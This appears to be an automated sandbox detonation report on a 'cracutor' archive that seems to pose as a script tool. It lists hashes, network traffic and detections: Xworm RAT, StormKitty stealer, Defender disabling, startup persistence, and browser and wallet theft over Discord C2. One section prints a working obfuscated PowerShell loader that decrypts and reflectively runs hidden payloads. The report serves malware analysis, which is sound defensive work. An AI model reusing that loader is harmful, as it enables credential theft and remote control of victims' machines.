SHA512 8cd6448b8324ade4d33cee7ab75660dc64fccbe1d5dc06a7ae306ef381f457eca2cfcee797fe4013488f5d2279fa6e078809d0701b87f1bdfdd2a97165a3c6e0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 75e3e96a304a2837db1f25abcc966b5a
SHA1 a6b16be03a082ac684705d1d616f371272e50f74
SHA256 37bfc9ad55c96f10a011e0b979f88f0d5447e5a535a897a768fe5c5e7397a856
SHA512 9d792df72e921ec5f4e8efb9b976830d9a7f6a2689d20e6b59080c1de8b7edf827be2c9c096afb253b125c8afcdfc3295116c301238866de87b42ca6d8e67c73

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 38cc7966ecaa0037aff73c7f5c85e05d
SHA1 123b9b3f1d3b92d1a5a55dcd62beb1b394ce29af
SHA256 cf9c70fcfddf35bc8fb674ae00ba73c1a258442681b3a15ebcb10b4fb5cbefc2
SHA512 459e9850006bedb0ab1e22bf614b0f377e1f676818945297ce692585909275d9b2b826f2c707739c0b40623028f3ba0452597359ec87d0b35b7dafd9990d9336

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 24db92c0bb78d11c547d7b515231b05c
SHA1 9579d5f8a5bf54a0d36bd8acf29b8b34a915b998
SHA256 d93ab86f5a3899ee9e197605513db86c0be786d74d38a16e165f7ebff04f70a6
SHA512 8b6850adb4e941d139beabc3ad546d22ddccf23c93c07e53bbc33373f46cee96274315e0cd257045fa61ec6ab710f468842e4720a0bc45f92d29ffa687ec18d2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8a45581c4ffc5d5979231abed140e82a
SHA1 e8d359f1461480ab16a6a2ef92f06d0b0d647b6b
SHA256 ff1021e0b8cd03076ba1641e9944e462bfacce950601895a3214b42239e4f659
SHA512 95e90acbdcf4f8282ad6f86179cfef5c7dae773f644976e9579765302d19cbd984de099f6dee98fef782cd452c4c78f8a858f04c776570ccd8b03176ec069d29

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 7acd84f9f2af7e7a6c8b78284d787283
SHA1 0b3f05875ea2154d3d074097cb6db2d6402a4471
SHA256 e750ddd154233083a6a66d270df5ff62abea8ab12ff9bb9e90f4e02f23e4f4e5
SHA512 693a64aff7900d6f865742548a2150287d3c9376e5f575cd40603565a295658f1b929598495c5fbcd8e57a967c1391952f70a7bba8dd49203a7cf2c78209dcc0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6cbc557d3a5dfe9d2cd0179ae105adff
SHA1 77a41414702d62a08183ea8ceaed59cf2b508937
SHA256 5a243f3f65cda2ecd23f5f133b98b273a55be3149aeb4dca6e0cfc65e0cfbd57
SHA512 6c126d844e451d987f9d706c6b7cc8c9c15ebfb3bded3a608c660361401f94a81a8f98d7f07f170fa35ef0bc3ac6b9345f90c4a0e2c9b16c3e3c4a4c6305acdd

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 90a133b960a93fdc8d97396650380d7f
SHA1 885bb0edabf3ef7e1db4e3f1d2b7491e86c9f89b
SHA256 00664ee98134b59af9ddcdeb3ec8626cf48c3a923863f6b43485fbbcb6044306
SHA512 57849d8e33b7ee420efecba201326baf9aebf05f0d97f476c3e159ccd1f904be9ace56c5857eb6f9ddf36eb2728b14988f5182665356dca90eb9b0b58d24213e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6297c4e926c5bd6dae0640b7add2eb4a
SHA1 887f2fc69cb89db5c05b60e7997230b94db1f575
SHA256 e897a45630a0b58a9be8cf769bd7b29473891e8c11787480d5a5980f7fdddd1b
SHA512 368db96ccfe212e19531eacdac6e828bdb641671f51ce56d48514f7d951f4e4fef6b4cbe32d0fa7b3b189abf720ccf67bbb133ef702f5695f54840c80fc97fec

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f48bb14747e05c64f382ed301f6f396d
SHA1 a76c7621a7361d7b999aef69dfacffa651646292
SHA256 d03778bd2f5269c3dd491f64ed4deb4ca0d8be696c75aea7a05b7f1bcbd5a5d8
SHA512 8cbc40c4d372747acab0c58b750d7f52838b5bb3e4a7572b5fa6715450261df6e48777aedc1df78526736758aaa5c6f9c14ca2e67f0d43a4f4d3b694016d8243

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ffd82bf6ee10fda4199cfd834a751f9e
SHA1 fa68d43634e4abcf43313b183ec3baecef085580
SHA256 d0cb7b2af23d7c390530f549c3c99356ff7aa5334981b5bc7c49c71f2cab5653
SHA512 12335227f1e90bbf4cff92e15d28791b28378f98d7c305884334ef390f5da1a3373ef3e5a8fc8de63a6859eab711e37339fedadaf74271984ffacc3ed26d62c2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 a1c830b4ec1bab1048851d0dd5759ef3
SHA1 e4b972828f5a3aa9cb3e8c22a1b9211b2ec0bc10
SHA256 e473f8b62bad8b65f1ec8e079b753b3bb8059f30643a48447bd7c65c0f2b8dff
SHA512 53870e9633936dbf647f10736d8053e005451674ad3480f63944ba152b8c07d2521294082de6a73c65887c0ff21b848d757e8a8ca4f8651620164e70c6b485e6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1107c82f6ce8721ef6a1ac9ebfa73627
SHA1 83a11ada1944e7a0b308076310b5f760388f567a
SHA256 acf7a33d89eb8be9974a376d5b1667e76ebbe324d91920aeb2160910706cc88e
SHA512 b77d03b17fb9d108635010fe0220dcb24164d4bc3e705f3a4d3cdb349e9ef56778b94becd47b7483fe02afd7f2c02bb008c75c4501b979d09e7c8d78dec97e67

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0e35a63cafd4276593bdfa0d32ff1810
SHA1 d70bcf7dd112dc50b81af59867fdcfbe6397b111
SHA256 5453be08fd7cb0243f86dadf759812daae0b353fc2df6bef909c360ad4af0283
SHA512 3cd8bb9fe9586f689a5d2e21e59d56d00d825995c04391b29c73ae2290f85045b546bd23c470b1711ab6762c3a1e60346ecd88766c1bc859b65ecce740437ce7

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c31ee3265306fa4fdb1b88fb969b99df
SHA1 86ea59e68d4a8906eac9cc8a555e04be6f593b75
SHA256 deb3df57a30c5b4e8148e85dd232b993ed65c162a64c849cb09684a954d4126d
SHA512 94c517ff6b7d0001c19469c0f2f86674dab6fdef4c71f409028521ed5c9021ee260f18791ed3dc43713aeb56a4068ac1495ab8926e22f557fc1e70189d98d50f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b3df56e2a92e0e9d42d48ea8ec3ef77f
SHA1 d28b465b24832bd9996d73f215b48449e8615483
SHA256 a94f2a399db515d0c881c13310cb35f24d2494cd1f81bd27bc008386223db499
SHA512 7dd66a01ca372b1931103270e1b61b7ea2adb650f5cc736f0b629a6f8a4bbc29cb30a4c35ae0653f4883cab9da6cf5c7b501dfd322a052ea253531c3d3a15b9c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f8d8bdd2164570408afb226b7a441662
SHA1 e7d8d22cba00793f373a5da3f3ca1e73c831c968
SHA256 edd226cc0bc4fb9c9c2cac307c8bb56e20f8a1269f3337d0156b3a1b86faedbb
SHA512 207cfcf15df956bc13b940b6e13e8add3fb9fdcc0251002694eaee80b8f5605a57ee448f9902db21e9565acbda83e7b953d359f3283a5dde0c53a99bd833fd61

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2c75cf1c07b30a7487a62074a0c1153a
SHA1 ecc0f2556d7d02daafea0013e5944e7aa0b4676c
SHA256 63498da9895c61eb719a8f4aa75874d7254860e548b8abcebfbc94c62a7789ea
SHA512 3daed3ba765043c1bbe675b1ae970171e2809a5d2ccec33273d0d6ae5d9adf6e96d8d774e04f7adbd790ffb8684e8cb46f2a8a4c9bef409bcd7b82edd6b5dd39

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

136s

Max time network

151s

Command Line

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.dll",#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\ICSharpCode.AvalonEdit.dll",#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

N/A

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win7-20240221-en

Max time kernel

121s

Max time network

123s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2204 wrote to memory of 2200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 2200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2204 wrote to memory of 2200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bGqAVpTkbyYHaVSHHBPmXa3kZNv3H8sCS4IjMuFm+Ow='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BbGL3tLWlvORK8IKqoYaHg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SERoH=New-Object System.IO.MemoryStream(,$param_var); $uVeFk=New-Object System.IO.MemoryStream; $zXgAh=New-Object System.IO.Compression.GZipStream($SERoH, [IO.Compression.CompressionMode]::Decompress); $zXgAh.CopyTo($uVeFk); $zXgAh.Dispose(); $SERoH.Dispose(); $uVeFk.Dispose(); $uVeFk.ToArray();}function execute_function($param_var,$param2_var){ $REYPt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $Drhro=$REYPt.EntryPoint; $Drhro.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat';$mZiIG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat').Split([Environment]::NewLine);foreach ($dACJS in $mZiIG) { if ($dACJS.StartsWith(':: ')) { $tZasG=$dACJS.Substring(3); break; }}$payloads_var=[string[]]$tZasG.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

N/A

Files

memory/2200-4-0x000007FEF5B7E000-0x000007FEF5B7F000-memory.dmp

memory/2200-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

memory/2200-8-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

memory/2200-7-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

memory/2200-6-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/2200-10-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

memory/2200-9-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

memory/2200-11-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

memory/2200-12-0x000007FEF58C0000-0x000007FEF625D000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

155s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\123.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\123.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 37.56.20.217.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

105s

Command Line

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Auto Execute\gg.txt"

Signatures

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Processes

C:\Windows\system32\NOTEPAD.EXE

C:\Windows\system32\NOTEPAD.EXE "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Scripts\Auto Execute\gg.txt"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

130s

Max time network

99s

Command Line

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\lua.xml"

Signatures

N/A

Processes

C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\lua.xml"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
NL 23.62.61.129:443 www.bing.com tcp
US 8.8.8.8:53 129.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/4512-0-0x00007FF96BA30000-0x00007FF96BA40000-memory.dmp

memory/4512-1-0x00007FF9ABA4D000-0x00007FF9ABA4E000-memory.dmp

memory/4512-2-0x00007FF9AB9B0000-0x00007FF9ABBA5000-memory.dmp

memory/4512-3-0x00007FF9AB9B0000-0x00007FF9ABBA5000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240508-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe

"C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\Neptune.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 scriptblox.com udp
US 172.67.68.166:443 scriptblox.com tcp
US 8.8.8.8:53 166.68.67.172.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/3764-0-0x0000000074A9E000-0x0000000074A9F000-memory.dmp

memory/3764-1-0x00000000002D0000-0x00000000004CE000-memory.dmp

memory/3764-2-0x0000000074A90000-0x0000000075240000-memory.dmp

memory/3764-3-0x00000000055A0000-0x0000000005B44000-memory.dmp

memory/3764-4-0x0000000005090000-0x000000000512E000-memory.dmp

memory/3764-5-0x0000000005B50000-0x0000000005BE2000-memory.dmp

memory/3764-6-0x0000000074A90000-0x0000000075240000-memory.dmp

memory/3764-7-0x00000000054D0000-0x00000000054D8000-memory.dmp

memory/3764-8-0x0000000005520000-0x0000000005558000-memory.dmp

memory/3764-9-0x00000000054F0000-0x00000000054FE000-memory.dmp

memory/3764-10-0x0000000074A9E000-0x0000000074A9F000-memory.dmp

memory/3764-14-0x0000000074A90000-0x0000000075240000-memory.dmp

memory/3764-15-0x0000000074A90000-0x0000000075240000-memory.dmp

memory/3764-16-0x0000000074A90000-0x0000000075240000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-19 17:20

Reported

2024-05-19 17:23

Platform

win10v2004-20240426-en

Max time kernel

137s

Max time network

144s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cracutor1.0\cracutor (1)\RuntimeBroker.bat"

Signatures

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RuntimeBroker.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\idcljz.exe C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\idcljz.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
